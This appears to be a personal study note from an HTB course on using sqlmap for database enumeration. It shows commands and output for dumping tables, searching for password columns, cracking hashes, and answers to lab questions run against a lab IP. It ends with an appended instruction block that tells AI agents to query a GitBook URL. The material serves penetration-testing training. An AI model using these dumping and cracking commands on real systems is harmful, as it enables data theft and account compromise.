# Database Enumeration ## Basic DB Data Enumeration Enumeration usually starts with the retrieval of the basic information: * Database version banner (switch `--banner`) * Current user name (switch `--current-user`) * Current database name (switch `--current-db`) * Checking if the current user has DBA (administrator) rights (switch `--is-dba`) ``` eldeim@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba ``` ## Table Enumeration ``` eldeim@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --tables -D testdb ...SNIP... [13:59:24] [INFO] fetching tables for database: 'testdb' Database: testdb [4 tables] +---------------+ | member | | data | | international | | users | +---------------+ ``` After spotting the table name of interest, retrieval of its content can be done by using the `--dump` option and specifying the table name with `-T users`, as follows: ```shell-session eldeim@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb ...SNIP... Database: testdb Table: users [4 entries] +----+--------+------------+ | id | name | surname | +----+--------+------------+ | 1 | luther | blisset | | 2 | fluffy | bunny | | 3 | wu | ming | | 4 | NULL | nameisnull | +----+--------+------------+ ``` ## Table/Row Enumeration ```shell-session eldeim@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --start=2 --stop=3 ...SNIP... Database: testdb Table: users [2 entries] +----+--------+---------+ | id | name | surname | +----+--------+---------+ | 2 | fluffy | bunny | | 3 | wu | ming | +----+--------+---------+ ``` To narrow down the rows based on their ordinal number(s) inside the table, we can specify the rows with the `--start` and `--stop` options (e.g., start from 2nd up to 3rd entry), as follows: ```shell-session eldeim@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname ...SNIP... Database: testdb Table: users [4 entries] +--------+------------+ | name | surname | +--------+------------+ | luther | blisset | | fluffy | bunny | | wu | ming | | NULL | nameisnull | +--------+------------+ ``` When dealing with large tables with many columns and/or rows, we can specify the columns (e.g., only `name` and `surname` columns) with the `-C` option, as follows: ## Conditional Enumeration If there is a requirement to retrieve certain rows based on a known `WHERE` condition (e.g. `name LIKE 'f%'`), we can use the option `--where`, as follows: ```shell-session eldeim@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'" ...SNIP... Database: testdb Table: users [1 entry] +----+--------+---------+ | id | name | surname | +----+--------+---------+ | 2 | fluffy | bunny | +----+--------+---------+ ``` ## Full DB Enumeration Instead of retrieving content per single-table basis, we can retrieve all tables inside the database of interest by skipping the usage of option `-T` altogether (e.g. `--dump -D testdb`). By simply using the switch `--dump` without specifying a table with `-T`, all of the current database content will be retrieved. As for the `--dump-all` switch, all the content from all the databases will be retrieved. In such cases, a user is also advised to include the switch `--exclude-sysdbs` (e.g. `--dump-all --exclude-sysdbs`), which will instruct SQLMap to skip the retrieval of content from system databases, as it is usually of little interest for pentesters. *** ### PoCs - Questions It is a basic injection, compared to the previous ones... ``` sqlmap http://94.237.57.57:43651/case1.php?id=1 -p id --batch ##dump sqlmap http://94.237.57.57:43651/case1.php?id=1 -p id --batch -D testdb -T flag1 --dump ``` *** ## DB Schema Enumeration We could use the switch `--schema`: ```shell-session eldeim@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --schema ...SNIP... Database: master Table: log [3 columns] +--------+--------------+ | Column | Type | +--------+--------------+ | date | datetime | | agent | varchar(512) | | id | int(11) | +--------+--------------+ Database: owasp10 Table: accounts [4 columns] +-------------+---------+ | Column | Type | +-------------+---------+ | cid | int(11) | | mysignature | text | | password | text | | username | text | +-------------+---------+ ... Database: testdb Table: data [2 columns] +---------+---------+ | Column | Type | +---------+---------+ | content | blob | | id | int(11) | +---------+---------+ Database: testdb Table: users [3 columns] +---------+---------------+ | Column | Type | +---------+---------------+ | id | int(11) | | name | varchar(500) | | surname | varchar(1000) | +---------+---------------+ ``` ## Searching for Data We can search for databases, tables, and columns of interest, by using the `--search` option. This option enables us to search for identifier names by using the `LIKE` operator. For example, if we are looking for all of the table names containing the keyword `user`, we can run SQLMap as follows: ```shell-session eldeim@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --search -T user ...SNIP... [14:24:19] [INFO] searching tables LIKE 'user' Database: testdb [1 table] +-----------------+ | users | +-----------------+ Database: master [1 table] +-----------------+ | users | +-----------------+ ``` We could also have tried to search for all column names based on a specific keyword (e.g. `pass`): ```shell-session eldeim@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --search -C pass ...SNIP... columns LIKE 'pass' were found in the following databases: Database: owasp10 Table: accounts [1 column] +----------+------+ | Column | Type | +----------+------+ | password | text | +----------+------+ Database: master Table: users [1 column] +----------+--------------+ | Column | Type | +----------+--------------+ | password | varchar(512) | +----------+--------------+ ``` ## Password Enumeration and Cracking Once we identify a table containing passwords (e.g. `master.users`), we can retrieve that table with the `-T` option, as previously shown: ```shell-session eldeim@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --dump -D master -T users ...SNIP... [14:31:41] [INFO] fetching columns for table 'users' in database 'master' [14:31:41] [INFO] fetching entries for table 'users' in database 'master' [14:31:41] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [14:31:41] [INFO] using hash method 'sha1_generic_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/local/share/sqlmap/data/txt/wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [14:31:41] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [14:31:41] [INFO] starting dictionary-based cracking (sha1_generic_passwd) [14:31:41] [INFO] starting 8 processes [14:31:41] [INFO] cracked password '05adrian' for hash '70f361f8a1c9035a1d972a209ec5e8b726d1055e' [14:31:41] [INFO] cracked password '1201Hunt' for hash 'df692aa944eb45737f0b3b3ef906f8372a3834e9' ...SNIP... [14:31:47] [INFO] cracked password 'Zc1uowqg6' for hash '0ff476c2676a2e5f172fe568110552f2e910c917' Database: master Table: users [32 entries] +----+------------------+-------------------+-----------------------------+--------------+------------------------+-------------------+-------------------------------------------------------------+---------------------------------------------------+ | id | cc | name | email | phone | address | birthday | password | occupation | +----+------------------+-------------------+-----------------------------+--------------+------------------------+-------------------+-------------------------------------------------------------+---------------------------------------------------+ | 1 | 5387278172507117 | Maynard Rice | MaynardMRice@yahoo.com | 281-559-0172 | 1698 Bird Spring Lane | March 1 1958 | 9a0f092c8d52eaf3ea423cef8485702ba2b3deb9 (3052) | Linemen | | 2 | 4539475107874477 | Julio Thomas | JulioWThomas@gmail.com | 973-426-5961 | 1207 Granville Lane | February 14 1972 | 10945aa229a6d569f226976b22ea0e900a1fc219 (taqris) | Agricultural product sorter | | 3 | 4716522746974567 | Kenneth Maloney | KennethTMaloney@gmail.com | 954-617-0424 | 2811 Kenwood Place | May 14 1989 | a5e68cd37ce8ec021d5ccb9392f4980b3c8b3295 (hibiskus) | General and operations manager | | 4 | 4929811432072262 | Gregory Stumbaugh | GregoryBStumbaugh@yahoo.com | 410-680-5653 | 1641 Marshall Street | May 7 1936 | b7fbde78b81f7ad0b8ce0cc16b47072a6ea5f08e (spiderpig8574376) | Foreign language interpreter | | 5 | 4539646911423277 | Bobby Granger | BobbyJGranger@gmail.com | 212-696-1812 | 4510 Shinn Street | December 22 1939 | aed6d83bab8d9234a97f18432cd9a85341527297 (1955chev) | Medical records and health information technician | | 6 | 5143241665092174 | Kimberly Wright | KimberlyMWright@gmail.com | 440-232-3739 | 3136 Ralph Drive | June 18 1972 | d642ff0feca378666a8727947482f1a4702deba0 (Enizoom1609) | Electrologist | | 7 | 5503989023993848 | Dean Harper | DeanLHarper@yahoo.com | 440-847-8376 | 3766 Flynn Street | February 3 1974 | 2b89b43b038182f67a8b960611d73e839002fbd9 (raided) | Store detective | | 8 | 4556586478396094 | Gabriela Waite | GabrielaRWaite@msn.com | 732-638-1529 | 2459 Webster Street | December 24 1965 | f5eb0fbdd88524f45c7c67d240a191163a27184b (ssival47) | Telephone station installer | ``` ## DB Users Password Enumeration and Cracking To ease the whole process, SQLMap has a special switch `--passwords` designed especially for such a task: ```shell-session eldeim@htb[/htb]$ sqlmap -u "http://www.example.com/?id=1" --passwords --batch ...SNIP... [14:25:20] [INFO] fetching database users password hashes [14:25:20] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique [14:25:20] [INFO] retrieved: 'root' [14:25:20] [INFO] retrieved: 'root' [14:25:20] [INFO] retrieved: 'root' [14:25:20] [INFO] retrieved: 'debian-sys-maint' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y [14:25:20] [INFO] using hash method 'mysql_passwd' what dictionary do you want to use? [1] default dictionary file '/usr/local/share/sqlmap/data/txt/wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > 1 [14:25:20] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [14:25:20] [INFO] starting dictionary-based cracking (mysql_passwd) [14:25:20] [INFO] starting 8 processes [14:25:26] [INFO] cracked password 'testpass' for user 'root' database management system users password hashes: [*] debian-sys-maint [1]: password hash: *6B2C58EABD91C1776DA223B088B601604F898847 [*] root [1]: password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 clear-text password: testpass [14:25:28] [INFO] fetched data logged to text files under '/home/user/.local/share/sqlmap/output/www.example.com' [*] ending @ 14:25:28 /2020-09-18/ ``` Tip: The '--all' switch in combination with the '--batch' switch, will automa(g)ically do the whole enumeration process on the target itself, and provide the entire enumeration details. ### PoCs - Questions * 1 What's the name of the column containing "style" in it's name? (Case #1) ``` sqlmap http://94.237.57.57:43651/case1.php?id=1 -p id --schema | grep -i style | PARAMETER_STYLE | varchar(8) ``` ``` sqlmap http://94.237.57.57:43651/case1.php?id=1 -p id --batch -D testdb -T users --columns --dump | grep -i Kimberly | 6 | 5143241665092174 | KimberlyMWright@gmail.com | 440-232-3739 | Kimberly Wright | 3136 Ralph Drive | June 18 1972 | d642ff0feca378666a8727947482f1a4702deba0 (Enizoom1609) | Electrologist ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://eldeim.gitbook.io/brain_fuck/notes/certifications/eastereggs/htb-cbbh/sqlmap-essentials/database-enumeration.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.